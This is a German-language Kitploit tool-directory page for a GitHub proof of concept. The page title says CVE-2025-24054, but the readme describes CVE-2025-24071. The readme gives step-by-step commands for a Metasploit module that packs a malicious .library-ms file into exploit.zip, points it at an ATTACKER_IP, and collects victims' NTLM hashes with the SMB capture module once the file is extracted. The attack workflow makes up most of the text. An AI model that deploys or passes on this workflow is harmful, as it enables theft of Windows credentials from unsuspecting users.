Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2025-24054 — POC für CVE-2025-24054 | Kitploit
Tools/GitHubGitHub/fomovet/cve-2025-24054
Penetrationstest-FrameworksExploit-FrameworksPayload-GenerierungSchwachstellenanalyseExploitationCommand and Control
GitHubfomovet/cve-2025-24054

cve-2025-24054

POC für CVE-2025-24054

Repository anzeigen
2vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-24071: NTLM-Hash-Leck über .library-ms-Datei (Metasploit-Modul)

Dieses Repository enthält ein Metasploit-Modul, das CVE-2025-24071 ausnutzt, eine Schwachstelle im Windows Explorer, die NTLM-Hashes preisgibt, wenn eine bösartige .library-ms-Datei aus einem ZIP-Archiv extrahiert wird.

Entwickelt von: FOLKS-IWD


Übersicht

Die Schwachstelle tritt auf, wenn ein Benutzer ein ZIP-Archiv extrahiert, das eine speziell gestaltete .library-ms-Datei enthält. Der Windows Explorer initiiert automatisch eine SMB-Authentifizierungsanforderung an einen in der Datei angegebenen Remote-Server und gibt dabei den NTLM-Hash des Benutzers ohne jegliche Benutzerinteraktion preis.

Dieses Metasploit-Modul:

  1. Erzeugt eine bösartige .library-ms-Datei.
  2. Packt sie in ein ZIP-Archiv.
  3. Integriert sich in die SMB-Capture-Funktionalität von Metasploit, um NTLM-Hashes zu sammeln. image

Installation

  1. Klone das Repository:
    root@kitploit:~
    git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
    cd CVE-2025-24071-msfvenom
    
Tool herunterladen
  • Kopiere das Modul in dein Metasploit-Module-Verzeichnis:
    root@kitploit:~
    cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
    
  • Verwendung

    1. Lade das Modul:
      root@kitploit:~
      use auxiliary/server/ntlm_hash_leak
      
    2. Setze die erforderlichen Optionen:
      root@kitploit:~
      set ATTACKER_IP 192.168.1.162  # Replace with your IP address
      set FILENAME exploit.zip       # Name of the malicious ZIP file
      set LIBRARY_NAME malicious.library-ms  # Name of the .library-ms file
      set SHARE_NAME shared          # SMB share name
      
    3. Führe das Modul aus :
      root@kitploit:~
      run
      
    4. Das Modul erzeugt eine bösartige ZIP-Datei (exploit.zip). Mache diese Datei verfügbar, damit das Opfer sie herunterladen und extrahieren kann.
    5. Verwende das SMB-Capture-Modul von Metasploit, um NTLM-Hashes zu sammeln:
      root@kitploit:~
      use auxiliary/server/capture/smb
      set SRVHOST 192.168.1.162  # Same as ATTACKER_IP
      run